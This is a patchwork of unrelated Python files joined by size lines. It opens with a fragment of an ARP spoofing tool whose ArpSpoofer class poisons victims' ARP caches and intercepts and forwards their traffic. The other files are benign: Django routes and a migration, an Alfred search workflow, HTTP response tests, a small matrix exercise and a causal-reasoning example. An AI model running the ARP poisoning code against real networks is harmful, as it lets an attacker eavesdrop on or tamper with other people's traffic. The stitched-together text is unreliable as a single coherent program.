            if Ether in outgoing and IP in outgoing and outgoing[IP].dst in self._ip_map:
                # Rewrite layer-2 addresses so the frame reaches the real host.
                real_dst = outgoing[IP].dst
                outgoing[Ether].dst = self._ip_map[real_dst]
                outgoing[Ether].src = self._mac
            sendp(outgoing, iface=self._interface, verbose=0)
        capture.stop_sniffing()
class ArpSpoofer():
    """Orchestrates an ARP man-in-the-middle attack on a set of targets.

    Discovers the targets' MAC addresses with a round of ARP requests,
    starts a request-based and a reply-based poisoner thread, and then
    intercepts/forwards the redirected traffic.
    """
    def __init__(self, network_address, interface, mac_address, ip_address):
        """Parse the target spec and prepare (but do not start) the attack.

        network_address is either a dashed last-octet range such as
        "10.0.0.5-20" or a network with a mask such as "10.0.0.0/24".
        """
        self._target_addresses = []
        # Check for a range
        if "-" in network_address:
            parts = network_address.split("-")
            start_ip = ipaddress.ip_address(parts[0])
            first_octet = int(start_ip.exploded.split(".")[3])
            range_end = int(parts[1])
            for offset in range(range_end - first_octet + 1):
                self._target_addresses.append(start_ip + offset)
        # Assume its a network with a mask
        else:
            # BUG FIX: the original code set network_address = None right
            # before parsing it, so ip_network() was always handed None
            # and the CIDR path could never work.
            if is_python_2():
                network = ipaddress.ip_network(unicode(network_address))
            else:
                network = ipaddress.ip_network(network_address)
            for host in network.hosts():
                self._target_addresses.append(host)
        # Parse the source IP (the ipaddress module needs unicode on Py2).
        if is_python_2():
            self._ip = ipaddress.ip_address(unicode(ip_address))
        else:
            self._ip = ipaddress.ip_address(ip_address)
        self._interface = interface
        self._mac = mac_address
        self._on_intercept = None
        self._mac_map = {}   # MAC -> IP, learned from ARP replies
        self._ip_map = {}    # IP -> MAC, learned from ARP replies
        self._pkt_queue = None
        self._running = True
        self._resp_poison = None
        self._req_poison = None
        # BUG FIX: initialize here so stop_spoof() is safe before
        # start_spoof() (also fixes the "_intecept" typo throughout).
        self._intercept = None
    def set_intercept(self, intercept_func):
        """Register a callback applied to every intercepted packet."""
        self._on_intercept = intercept_func
    def start_spoof(self, on_packet=None):
        """Map targets to MACs, start the poisoners and begin intercepting.

        Raises RuntimeError when every configured target is ourselves.
        """
        print("Building IP to MAC address map...")
        arp_queue = queue.Queue()
        arp_resp_sniff = SniffThread(self._interface, arp_queue, "arp")
        arp_resp_sniff.start()
        time.sleep(0.5)  # let the sniffer attach before we start probing
        probed_hosts = []
        for host in self._target_addresses:
            if host == self._ip:
                print("! - Skipping self at " + str(self._ip))
                continue
            arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=self._mac, type=0x806)/ARP(op=1, pdst=str(host), psrc=str(self._ip))
            sendp(arp_frame, iface=self._interface, verbose=0)
            probed_hosts.append(host)
        time.sleep(1)  # give the hosts time to answer
        arp_resp_sniff.stop_sniffing()
        while not arp_queue.empty():
            resp = arp_queue.get()
            if ARP in resp and resp[ARP].op == 2:
                self._mac_map[resp[ARP].hwsrc] = resp[ARP].psrc
                self._ip_map[resp[ARP].psrc] = resp[ARP].hwsrc
        # ROBUSTNESS FIX: the original indexed all_hosts[-1] unconditionally
        # and crashed with IndexError when nothing was probed.
        if not probed_hosts:
            raise RuntimeError("No hosts to spoof (all targets were self)")
        # Prefer an IP no live host answered for; fall back to the last
        # probed address if every target responded.
        free_ip = probed_hosts[-1]
        for host in self._target_addresses:
            if str(host) not in self._ip_map:
                free_ip = str(host)
                break
        print("Mapping complete...")
        self._req_poison = ArpRequestPoisoner(self._mac, self._interface, self._ip_map, free_ip)
        self._req_poison.start()
        self._resp_poison = ArpResponsePoisoner(self._mac, self._interface, self._ip_map)
        self._resp_poison.start()
        print("Intercepting packets...")
        self._intercept = PacketIntercept(self._mac, self._ip, self._interface, self._ip_map, on_packet)
        self._intercept.start()
    def stop_spoof(self):
        """Stop poisoning, restore the victims' caches and stop intercepting."""
        print("Re-arping clients")
        if self._resp_poison:
            self._resp_poison.stop_poison()
            self._resp_poison.join()
        if self._req_poison:
            self._req_poison.stop_poison()
            self._req_poison.join()
        print("Stopping intercept...")
        if self._intercept:
            self._intercept.stop_processing()
            self._intercept.join()
| 10,351 | 3,284 |
# Copyright (c) 2017, Manito Networks, LLC
# All rights reserved.
# NOTE: This is updated as we have time, and is by no means comprehensive yet.
# Lookup table from the first three octets of a MAC address (the OUI,
# upper-case hex without separators) to the hardware vendor name.
mac_prefix = {
	# Apple
	"00CDFE":"Apple",
	"18AF61":"Apple",
	# Cisco
	"CC46D6":"Cisco",
	"58AC78":"Cisco",
	# D-Link
	"0050BA":"D-Link",
	"00179A":"D-Link",
	"1CBDB9":"D-Link",
	"9094E4":"D-Link",
	"28107B":"D-Link",
	"1C7EE5":"D-Link",
	"C4A81D":"D-Link",
	# Hewlett Packard
	"3CD92B":"Hewlett Packard",
	"9C8E99":"Hewlett Packard",
	"B499BA":"Hewlett Packard",
	"1CC1DE":"Hewlett Packard",
	# Netgear
	"2C3033":"Netgear",
	# FF:FF:FF broadcast prefix, not a vendor
	"FFFFFF":"Broadcast"
	}
from django.urls import path
from test_app import views
# Route table for the test app: one URL per view in test_app.views.
# NOTE(review): view behaviour inferred from names only — confirm in views.
urlpatterns = [
    path("save-obj/", views.save_obj_view),
    path("save-obj-error/", views.save_obj_error_view),
    path("create-revision/", views.create_revision_view),
    path("revision-mixin/", views.RevisionMixinView.as_view()),
]
| 298 | 106 |
#===============================================================
# Restrict size of printed list
#===============================================================
import numpy as np
def restrict_sizeList(input_list, size):
    """Return an abbreviated string form of a long list: "[a, b, ..., y, z]".

    For 1-D input longer than 2*size elements, the first and last `size`
    values are shown (formatted to two decimals) with an ellipsis between.
    Shorter 1-D input is returned via str(); a single element is returned
    bare. 3-D arrays are abbreviated from numpy's own rendering. Any other
    dimensionality falls back to plain str().
    """
    # For 1D arrays or list, return [ a b c ... x y z ]
    if np.array(input_list).ndim == 1:
        values = list(input_list)
        if len(values) > size * 2:
            # Long list: join head and tail slices instead of index loops.
            head = ", ".join("{0:.2f}".format(v) for v in values[:size])
            tail = ", ".join("{0:.2f}".format(v) for v in values[-size:])
            return "[" + head + ", ..., " + tail + "]"
        if len(values) == 1:
            # Single element: returned without brackets (original behaviour).
            return str(values[0])
        return str(values)
    # For 3D array, return [[[a, b, c], ... , [d, e, f]]]
    if np.array(input_list).ndim == 3:
        arr = np.array(input_list)
        rendered = np.array2string(arr, formatter={'float_kind': lambda x: "%.2E" % x})
        # Keep roughly the first/last 43 characters of numpy's rendering.
        return rendered[0:43].replace("\n", "") + ', ..., ' + rendered[-44:].replace("\n", "")
    # BUG FIX: 2-D (and any other ndim) input previously fell through and
    # returned None; return a plain string representation instead.
    return str(input_list)
| 1,410 | 458 |
from django.contrib import admin
from .models import *
# Expose the app's models in the Django admin with the default ModelAdmin.
admin.site.register(Course)
admin.site.register(UserCourse)
admin.site.register(Partition)
admin.site.register(PartitionTask)
| 182 | 57 |
from db.models import *
def unpack_query_objects(objects) -> list:
    """Serialize an iterable of model objects via their to_dict() methods.

    Returns a list of plain dicts, one per object, preserving input order.
    BUG FIX: the return annotation previously claimed ``dict`` although the
    function has always returned a list.
    """
    return [obj.to_dict() for obj in objects]
def stringify_object(object) -> dict:
    """Return the object's to_dict() mapping with every value cast to str.

    Keys are left untouched; only values pass through str(). The parameter
    keeps its original name ``object`` (shadowing the builtin) to preserve
    the existing call signature.
    """
    return {key: str(value) for key, value in object.to_dict().items()}
| 350 | 117 |
import gdsfactory as gf
from gdsfactory.gdsdiff.gdsdiff import gdsdiff
if __name__ == "__main__":
    # Build two straight components of different lengths and show their
    # geometric diff in the layout viewer.
    c1 = gf.components.straight(length=2)
    c2 = gf.components.straight(length=3)
    c = gdsdiff(c1, c2)
    c.show()
| 221 | 99 |
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2016 Dean Jackson <deanishe@deanishe.net>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2016-12-17
#
"""searchio reload [-h]
Update info.plist from saved searches.
Usage:
searchio reload [--defaults]
searchio -h
Options:
-d, --defaults Use default searches, not user's.
-h, --help Display this help message.
"""
from __future__ import print_function, absolute_import
import json
import os
from plistlib import readPlist, readPlistFromString, writePlist
from docopt import docopt
from searchio.core import Context
from searchio.engines import Search
from searchio import util
log = util.logger(__name__)
# X position of all generated Script Filters
XPOS = 270
# Y position of first Script Filter
YPOS = 220
# Vertical space between (top of) each Script Filter
YOFFSET = 170
# UID of action to connect Script Filters to
OPEN_URL_UID = '1133DEAA-5A8F-4E7D-9E9C-A76CB82D9F92'
# Property-list template for one generated Script Filter object. The uid,
# keyword, title and script values below are placeholders that are
# overwritten per search in add_script_filters() before the object is
# inserted into info.plist.
SCRIPT_FILTER = """
<dict>
<key>config</key>
<dict>
<key>alfredfiltersresults</key>
<false/>
<key>alfredfiltersresultsmatchmode</key>
<integer>0</integer>
<key>argumenttrimmode</key>
<integer>0</integer>
<key>argumenttype</key>
<integer>0</integer>
<key>escaping</key>
<integer>102</integer>
<key>keyword</key>
<string>g</string>
<key>queuedelaycustom</key>
<integer>3</integer>
<key>queuedelayimmediatelyinitially</key>
<false/>
<key>queuedelaymode</key>
<integer>0</integer>
<key>queuemode</key>
<integer>2</integer>
<key>runningsubtext</key>
<string>Fetching results…</string>
<key>script</key>
<string>./searchio search google-en "$1"</string>
<key>scriptargtype</key>
<integer>1</integer>
<key>scriptfile</key>
<string></string>
<key>subtext</key>
<string>Searchio!</string>
<key>title</key>
<string>Google Search (English)</string>
<key>type</key>
<integer>0</integer>
<key>withspace</key>
<true/>
</dict>
<key>type</key>
<string>alfred.workflow.input.scriptfilter</string>
<key>uid</key>
<string>18E144DF-1054-4A12-B5F0-AC05C6F7DEFD</string>
<key>version</key>
<integer>2</integer>
</dict>
"""
# Default search engines
DEFAULTS = [
{
'title': 'Google (English)',
'icon': 'icons/engines/google.png',
'jsonpath': '$[1][*]',
'keyword': 'g',
'search_url': 'https://www.google.com/search?q={query}&hl=en&safe=off',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&q={query}&hl=en',
'uid': 'google-en',
},
{
'title': 'Google (Deutsch)',
'icon': 'icons/engines/google.png',
'jsonpath': '$[1][*]',
'keyword': 'gd',
'search_url': 'https://www.google.com/search?q={query}&hl=de&safe=off',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&q={query}&hl=de',
'uid': 'google-de',
},
{
'title': 'Wikipedia (English)',
'icon': 'icons/engines/wikipedia.png',
'jsonpath': '$[1][*]',
'pcencode': True,
'keyword': 'w',
'search_url': 'https://en.wikipedia.org/wiki/{query}',
'suggest_url': 'https://en.wikipedia.org/w/api.php?action=opensearch&search={query}',
'uid': 'wikipedia-en',
},
{
'title': 'Wikipedia (Deutsch)',
'icon': 'icons/engines/wikipedia.png',
'jsonpath': '$[1][*]',
'pcencode': True,
'keyword': 'wd',
'search_url': 'https://de.wikipedia.org/wiki/{query}',
'suggest_url': 'https://de.wikipedia.org/w/api.php?action=opensearch&search={query}',
'uid': 'wikipedia-de',
},
{
'title': 'YouTube (United States)',
'icon': 'icons/engines/youtube.png',
'jsonpath': '$[1][*]',
'keyword': 'yt',
'search_url': 'https://www.youtube.com/results?gl=us&persist_gl=1&search_query={query}',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&ds=yt&hl=us&q={query}',
'uid': 'youtube-us',
},
{
'title': 'YouTube (Germany)',
'icon': 'icons/engines/youtube.png',
'jsonpath': '$[1][*]',
'keyword': 'ytd',
'search_url': 'https://www.youtube.com/results?gl=de&persist_gl=1&search_query={query}',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&ds=yt&hl=de&q={query}',
'uid': 'youtube-de',
},
]
def usage(wf=None):
    """Return the module docstring, which doubles as the docopt usage text.

    ``wf`` is accepted for signature parity with the other sub-commands
    and is ignored.
    """
    return __doc__
def remove_script_filters(wf, data):
    """Remove auto-generated Script Filters from info.plist data.

    Generated objects are recognised by their uidata entries lacking a
    'colorindex' key. Matching Script Filter objects are dropped from
    data['objects'] and their connections/uidata entries cleaned up.
    The data dict is modified in place.
    """
    # uids whose uidata looks auto-generated (no 'colorindex' key).
    generated = set()
    for uid, uidata in data['uidata'].items():
        if 'colorindex' not in uidata:
            generated.add(uid)
    keep = []
    removed = []
    for obj in data['objects']:
        if obj['uid'] in generated and \
                obj['type'] == 'alfred.workflow.input.scriptfilter':
            log.info('Removed Script Filter "%s" (%s)',
                     obj['config']['title'], obj['uid'])
            removed.append(obj['uid'])
            continue
        keep.append(obj)
    data['objects'] = keep
    # Remove connections and uidata.
    # BUG FIX: pop() with a default instead of del — a generated Script
    # Filter may have no connections entry, which made del raise KeyError.
    for uid in removed:
        data['connections'].pop(uid, None)
        data['uidata'].pop(uid, None)
def add_script_filters(wf, data, searches=None):
    """Add user searches to info.plist data.

    If ``searches`` is given, save them to the user's searches directory
    first and (re-)add only those; otherwise add every saved search. One
    Script Filter object (from the SCRIPT_FILTER template) is generated
    per search and connected to the shared Open URL action. The data dict
    is modified in place.
    """
    ctx = Context(wf)
    only = set()
    if searches:  # add them to the user's searches dir
        for s in searches:
            path = os.path.join(ctx.searches_dir, s.uid + '.json')
            # BUG FIX: json.dump() writes text, so the file must be opened
            # in text mode — 'wb' breaks under Python 3 ('w' also works on
            # Python 2).
            with open(path, 'w') as fp:
                json.dump(s.dict, fp)
            only.add(s.uid)
            log.info('Saved search "%s"', s.title)
    f = util.FileFinder([ctx.searches_dir], ['json'])
    searches = [Search.from_file(p) for p in f]
    if only:
        searches = [s for s in searches if s.uid in only]
    searches.sort(key=lambda s: s.title)
    ypos = YPOS
    for s in searches:
        if not s.keyword:
            log.error('No keyword for search "%s" (%s)', s.title, s.uid)
            continue
        # Instantiate the template and fill in the per-search fields.
        d = readPlistFromString(SCRIPT_FILTER)
        d['uid'] = s.uid
        d['config']['title'] = s.title
        d['config']['script'] = './search {} "$1"'.format(s.uid)
        d['config']['keyword'] = s.keyword
        data['objects'].append(d)
        # Wire the new Script Filter to the shared Open URL action.
        data['connections'][s.uid] = [{
            'destinationuid': OPEN_URL_UID,
            'modifiers': 0,
            'modifiersubtext': '',
            'vitoclose': False,
        }]
        # Stack the generated filters vertically in the workflow canvas.
        data['uidata'][s.uid] = {
            'note': s.title,
            'xpos': XPOS,
            'ypos': ypos,
        }
        ypos += YOFFSET
        log.info('Added Script Filter "%s" (%s)', s.title, s.uid)
    link_icons(wf, searches)
def link_icons(wf, searches):
    """Create symlinks in the workflow directory for each search's icon."""
    # Drop stale icon symlinks left over from previous runs.
    for entry in os.listdir(wf.workflowdir):
        if not entry.endswith('.png'):
            continue
        full = wf.workflowfile(entry)
        if os.path.islink(full):
            os.unlink(full)
            log.debug('Removed search icon "%s"', full)
    # Link each search's icon as <uid>.png, skipping ones already present.
    for search in searches:
        target = wf.workflowfile(search.uid + '.png')
        if os.path.exists(target):
            continue
        rel_src = os.path.relpath(search.icon, wf.workflowdir)
        rel_target = os.path.relpath(target, wf.workflowdir)
        log.debug('Linking "%s" to "%s"', rel_src, rel_target)
        os.symlink(rel_src, rel_target)
def run(wf, argv):
    """Run ``searchio reload`` sub-command.

    Regenerates the workflow's Script Filters in info.plist from the saved
    searches, or from the bundled DEFAULTS when --defaults is passed.
    """
    args = docopt(usage(wf), argv)
    searches = None
    log.debug('args=%r', args)
    if args['--defaults']:
        # Use the bundled default engines instead of the user's saved ones.
        searches = [Search.from_dict(d) for d in DEFAULTS]
    ip = wf.workflowfile('info.plist')
    data = readPlist(ip)
    # Strip previously generated Script Filters, then re-add current ones.
    remove_script_filters(wf, data)
    add_script_filters(wf, data, searches)
    writePlist(data, ip)
| 8,239 | 2,883 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-09-11 07:00
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import lessons.filefield
class Migration(migrations.Migration):
    """Auto-generated migration (Django 1.11): adds the TargetLanguage model
    and re-declares choices/defaults on several existing fields."""
    dependencies = [
        ('lessons', '0004_flashcard_is_bordered'),
    ]
    operations = [
        # New per-lesson "target language" rows, cascading with their Lesson.
        migrations.CreateModel(
            name='TargetLanguage',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('target_language', models.CharField(max_length=128)),
                ('color', models.CharField(choices=[('RE', 'Red'), ('BL', 'Blue')], default='RE', max_length=32)),
                ('notes', models.CharField(max_length=64)),
                ('lesson', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='lessons.Lesson')),
            ],
        ),
        # The AlterField operations below record updated choices/defaults;
        # choices changes are metadata-only and do not rewrite table data.
        migrations.AlterField(
            model_name='activity',
            name='activity_portion_type',
            field=models.CharField(choices=[('GE', 'Generic/Other'), ('GR', 'Greeting'), ('WA', 'Warmup'), ('PE', 'Presentation'), ('PA', 'Practice'), ('PO', 'Production'), ('CO', 'Cooldown'), ('AS', 'Assessment')], default=None, max_length=32, null=True),
        ),
        migrations.AlterField(
            model_name='activity',
            name='activity_skill_type',
            field=models.CharField(choices=[('VO', 'Vocabulary Practice'), ('CO', 'Speaking Practice'), ('LI', 'Listening Practice'), ('OT', 'Other Skills (e.g.: song, dance)')], default='VO', max_length=32),
        ),
        migrations.AlterField(
            model_name='activity',
            name='activity_source_type',
            field=models.CharField(choices=[('BF', "Book-Free Activities -- These don't require the book."), ('BB', 'Book-Bound Activities -- These require the book.')], default='BF', max_length=32),
        ),
        migrations.AlterField(
            model_name='course',
            name='course_code',
            field=models.CharField(max_length=12),
        ),
        migrations.AlterField(
            model_name='flashcard',
            name='flashcard_type',
            field=models.CharField(choices=[('PL', 'Flashcard with picture and label'), ('PO', 'Flashcard with picture only'), ('FB', 'Two pages: front (picture) and back (label)')], default='PL', max_length=32),
        ),
        migrations.AlterField(
            model_name='flashcard',
            name='orientation',
            field=models.CharField(choices=[('PO', 'Portrait'), ('LA', 'Landscape')], default='PO', max_length=32),
        ),
        migrations.AlterField(
            model_name='flashcard',
            name='picture',
            # Custom FileField subclass; presumably restricts upload content type — see lessons.filefield.
            field=lessons.filefield.ContentTypeRestrictedFileField(upload_to='media/flashcards/'),
        ),
    ]
| 2,882 | 870 |
import os
import sys
if sys.version_info >= (3, 8):
from unittest import IsolatedAsyncioTestCase as TestCase
else:
from unittest import TestCase
import pytest
import jj
from jj import server_version
from jj.apps import create_app
from jj.handlers import default_handler
from jj.matchers import MethodMatcher
from jj.resolvers import Registry, ReversedResolver
from jj.responses import Response
from .._test_utils import run
class TestResponse(TestCase):
    """End-to-end tests for jj's Response: each test spins up an app whose
    catch-all handler returns a Response built with the given arguments,
    then inspects what an HTTP client actually receives."""
    def make_app_with_response(self, *args, **kwargs):
        """Build an app whose handler answers every method/path with
        ``Response(*args, **kwargs)``."""
        class App(jj.App):
            resolver = self.resolver
            # "*" matches any HTTP method, so every request hits this handler.
            @MethodMatcher("*", resolver=resolver)
            async def handler(request):
                return Response(*args, **kwargs)
        return App()
    def make_path(self, path):
        """Resolve *path* relative to this test module's directory."""
        return os.path.join(os.path.dirname(__file__), path)
    def setUp(self):
        # Fresh app/resolver per test so handler registrations don't leak.
        self.default_app = create_app()
        self.resolver = ReversedResolver(Registry(), self.default_app, default_handler)
    @pytest.mark.asyncio
    async def test_response_with_default_args(self):
        app = self.make_app_with_response()
        async with run(app) as client:
            response = await client.get("/")
            # status
            self.assertEqual(response.status, 200)
            self.assertEqual(response.reason, "OK")
            # headers
            self.assertEqual(response.headers.get("Server"), server_version)
            self.assertEqual(response.headers.get("Content-Length"), "0")
            self.assertEqual(response.headers.get("Content-Type"), "text/plain; charset=utf-8")
            self.assertIsNotNone(response.headers.get("Date"))
            # exactly Server, Content-Length, Content-Type, Date — nothing else
            self.assertEqual(len(response.headers), 4)
            # body
            raw = await response.read()
            self.assertEqual(raw, b"")
    @pytest.mark.asyncio
    async def test_response_with_conflicted_args(self):
        # text/body/json are mutually exclusive ways to set the payload.
        payload = "200 OK"
        with self.assertRaises(Exception):
            Response(text=payload, body=payload)
        with self.assertRaises(Exception):
            Response(text=payload, json=payload)
        with self.assertRaises(Exception):
            Response(body=payload, json=payload)
    # Status
    @pytest.mark.asyncio
    async def test_response_status(self):
        status = 204
        app = self.make_app_with_response(status=status)
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(response.status, status)
            # aiohttp automatically supplies the matching reason phrase
            self.assertEqual(response.reason, "No Content")
    @pytest.mark.asyncio
    async def test_response_reason(self):
        # An explicit reason overrides the default phrase for the status.
        status, reason = 204, "Custom Reason"
        app = self.make_app_with_response(status=status, reason=reason)
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(response.status, status)
            self.assertEqual(response.reason, reason)
    # Body
    @pytest.mark.asyncio
    async def test_response_body(self):
        # str body -> text/plain with charset, length counted in bytes.
        body = "200 OK"
        binary_body = b"200 OK"
        app = self.make_app_with_response(body=body)
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(await response.text(), body)
            self.assertEqual(await response.read(), binary_body)
            self.assertEqual(response.headers.get("Content-Length"), str(len(body)))
            self.assertEqual(response.headers.get("Content-Type"), "text/plain; charset=utf-8")
    @pytest.mark.asyncio
    async def test_response_text_body(self):
        # text= behaves like a str body=.
        text = "200 OK"
        binary_text = b"200 OK"
        app = self.make_app_with_response(text=text)
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(await response.text(), text)
            self.assertEqual(await response.read(), binary_text)
            self.assertEqual(response.headers.get("Content-Length"), str(len(text)))
            self.assertEqual(response.headers.get("Content-Type"), "text/plain; charset=utf-8")
    @pytest.mark.asyncio
    async def test_response_json_body(self):
        # json= serializes the payload and sets application/json.
        json = {"key": None}
        dumped_json = '{"key": null}'
        binary_json = b'{"key": null}'
        app = self.make_app_with_response(json=json)
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(await response.json(), json)
            self.assertEqual(await response.text(), dumped_json)
            self.assertEqual(await response.read(), binary_json)
            self.assertEqual(response.headers.get("Content-Length"), str(len(dumped_json)))
            self.assertEqual(response.headers.get("Content-Type"), "application/json")
    @pytest.mark.asyncio
    async def test_response_json_body_with_custom_content_type(self):
        # An explicit Content-Type header wins over the json default.
        json = {"key": None}
        dumped_json = '{"key": null}'
        binary_json = b'{"key": null}'
        content_type = "text/plain"
        app = self.make_app_with_response(json=json, headers={"Content-Type": content_type})
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(await response.text(), dumped_json)
            self.assertEqual(await response.read(), binary_json)
            self.assertEqual(response.headers.get("Content-Length"), str(len(dumped_json)))
            self.assertEqual(response.headers.get("Content-Type"), content_type)
    @pytest.mark.asyncio
    async def test_response_null_json_body(self):
        # json=None is a real JSON payload ("null"), not an omitted body.
        json = None
        dumped_json = 'null'
        binary_json = b'null'
        app = self.make_app_with_response(json=json)
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(await response.json(), json)
            self.assertEqual(await response.text(), dumped_json)
            self.assertEqual(await response.read(), binary_json)
            self.assertEqual(response.headers.get("Content-Length"), str(len(dumped_json)))
            self.assertEqual(response.headers.get("Content-Type"), "application/json")
    @pytest.mark.asyncio
    async def test_response_binary_body(self):
        # bytes body -> application/octet-stream.
        body = b"200 OK"
        app = self.make_app_with_response(body=body)
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(await response.text(), body.decode())
            self.assertEqual(await response.read(), body)
            self.assertEqual(response.headers.get("Content-Length"), str(len(body)))
            self.assertEqual(response.headers.get("Content-Type"), "application/octet-stream")
    @pytest.mark.asyncio
    async def test_response_predefined_text_body(self):
        # A text-mode file object as body is streamed with an inline disposition.
        path = self.make_path("fixtures/users.json")
        with open(path, "rt") as f:
            body = f.read()
        app = self.make_app_with_response(body=open(path, "rt"))
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(await response.text(), body)
            self.assertEqual(response.headers.get("Content-Length"), str(len(body)))
            self.assertEqual(response.headers.get("Content-Type"), "text/plain; charset=utf-8")
            self.assertEqual(response.headers.get("Content-Disposition"), "inline")
    @pytest.mark.asyncio
    async def test_response_predefined_binary_body(self):
        # A binary file object: the Content-Type comes out as application/json,
        # presumably guessed from the .json filename — confirm against jj docs.
        path = self.make_path("fixtures/users.json")
        with open(path, "rb") as f:
            body = f.read()
        app = self.make_app_with_response(body=open(path, "rb"))
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(await response.text(), body.decode())
            self.assertEqual(await response.read(), body)
            self.assertEqual(response.headers.get("Content-Length"), str(len(body)))
            self.assertEqual(response.headers.get("Content-Type"), "application/json")
            self.assertEqual(response.headers.get("Content-Disposition"), "inline")
    # Headers
    @pytest.mark.asyncio
    async def test_response_header(self):
        # NOTE(review): "Cutom-Header" typo is preserved — it is the literal
        # header name this test sends and asserts on.
        custom_header_key, custom_header_val = "Cutom-Header", "Value"
        app = self.make_app_with_response(headers={custom_header_key: custom_header_val})
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(response.headers.get(custom_header_key), custom_header_val)
            self.assertEqual(response.headers.get("Server"), server_version)
    @pytest.mark.asyncio
    async def test_response_headers(self):
        # A list of pairs allows repeated header names; both values survive.
        custom_header1_key, custom_header1_val = "Cutom-Header", "Value1"
        custom_header2_key, custom_header2_val = "Cutom-Header", "Value2"
        app = self.make_app_with_response(headers=[
            (custom_header1_key, custom_header1_val),
            (custom_header2_key, custom_header2_val),
        ])
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(response.headers.getall(custom_header1_key),
                             [custom_header1_val, custom_header2_val])
            self.assertEqual(response.headers.get("Server"), server_version)
    @pytest.mark.asyncio
    async def test_response_with_custom_server_header(self):
        # A user-supplied Server header replaces the default server_version.
        server_header = "server version x"
        app = self.make_app_with_response(headers={"Server": server_header})
        async with run(app) as client:
            response = await client.get("/")
            self.assertEqual(response.headers.get("Server"), server_header)
    @pytest.mark.asyncio
    async def test_response_with_expect_header(self):
        # Expect: 100-continue handshake still yields a normal 200.
        app = self.make_app_with_response()
        async with run(app) as client:
            response = await client.post("/", json={}, expect100=True)
            self.assertEqual(response.status, 200)
    @pytest.mark.asyncio
    async def test_response_with_incorrect_expect_header(self):
        # An unrecognized Expect value is rejected with 417 Expectation Failed.
        app = self.make_app_with_response()
        async with run(app) as client:
            response = await client.post("/", json={}, headers={"Expect": "banana"})
            self.assertEqual(response.status, 417)
| 10,308 | 3,029 |
'''
Q04 - Build a 3x3 matrix of integers and display its main diagonal.
(Elements are filled with random values in [10, 60] instead of user input.)
'''
import random

matriz = []
diagonalPrincipal = []
for row in range(3):
    values = []
    for col in range(3):
        values.append(random.randint(10, 60))
        # A main-diagonal element has equal row and column indices.
        if row == col:
            diagonalPrincipal.append(values[row])
    matriz.append(values)
print()
# First pass prints matriz[col][row], i.e. the transpose of the matrix.
for row in range(3):
    for col in range(3):
        print(f"[{matriz[col][row]}]", end='')
    print()
print()
# Second pass prints the matrix in natural row order.
for row in range(3):
    for col in range(3):
        print(f"[{matriz[row][col]}]", end='')
    print()
print()
print(diagonalPrincipal)
| 766 | 318 |
from django.apps import AppConfig
class ServersConfig(AppConfig):
    """Django app configuration for the 'servers' app."""
    name = 'servers'
    def ready(self):
        # Import for side effect only: registers the app's signal handlers
        # once Django has finished loading the app registry.
        import servers.signals
| 142 | 43 |
from frozendict import frozendict
from lib.halpern_pearl import Variable, CausalNetwork, CausalSetting, find_actual_causes, CausalFormula, PrimitiveEvent, \
Negation, find_trivial_explanations, EpistemicState, find_nontrivial_explanations, find_explanations, \
find_sufficient_causes
# Disjunctive forest-fire example: FF (forest fire) is caused by L (lightning)
# OR MD (match dropped); U_L and U_MD are the exogenous variables driving them.
U_L, U_MD = Variable("U_L"), Variable("U_MD")
FF, L, MD = Variable("FF"), Variable("L"), Variable("MD")
exogenous_domains = {
    U_L: {False, True},
    U_MD: {False, True}
}
endogenous_domains = {
    FF: {False, True},
    L: {False, True},
    MD: {False, True}
}
# Structural equations: FF = L or MD; L and MD copy their exogenous inputs.
causal_network = CausalNetwork()
causal_network.add_dependency(FF, [L, MD], lambda parent_values: parent_values[L] or parent_values[MD])
causal_network.add_dependency(L, [U_L], lambda parent_values: parent_values[U_L])
causal_network.add_dependency(MD, [U_MD], lambda parent_values: parent_values[U_MD])
# Context (1, 1): both lightning and the dropped match occur.
context = {U_L: True, U_MD: True}
causal_setting = CausalSetting(causal_network, context, exogenous_domains, endogenous_domains)
event = PrimitiveEvent(FF, True)
# list(find_actual_causes(event, causal_setting))
causal_network.write("forest_fire_disjunctive.png")
# Actual causes of FF=1: FF itself, and the conjunction L=1 & MD=1
# (neither alone, since the other disjunct would still cause the fire).
actual_causes = {frozendict(actual_cause) for actual_cause in find_actual_causes(event, causal_setting)}
expected_actual_causes = [{FF: True}, {L: True, MD: True}]
assert actual_causes == {frozendict(expected_actual_cause) for expected_actual_cause in expected_actual_causes}
# Sufficient causes: every assignment set containing at least one of FF/L/MD set to 1.
sufficient_causes = {frozendict(sufficient_cause) for sufficient_cause in find_sufficient_causes(event, causal_setting)}
expected_sufficient_causes = [{FF: True}, {L: True}, {FF: True, L: True}, {MD: True}, {FF: True, MD: True}, {L: True, MD: True}, {FF: True, L: True, MD: True}]
assert sufficient_causes == {frozendict(expected_sufficient_cause) for expected_sufficient_cause in expected_sufficient_causes}
# Interventional formulas from Halpern (2016), p. 21.
assert CausalFormula({MD: False}, event).entailed_by(causal_setting)  # (Md, (1, 1)) |= [MD ← 0](FF = 1) example from Page 21 [Halpern, 2016]
assert CausalFormula({L: False}, event).entailed_by(causal_setting)  # (Md, (1, 1)) |= [L ← 0](FF = 1) example from Page 21 [Halpern, 2016]
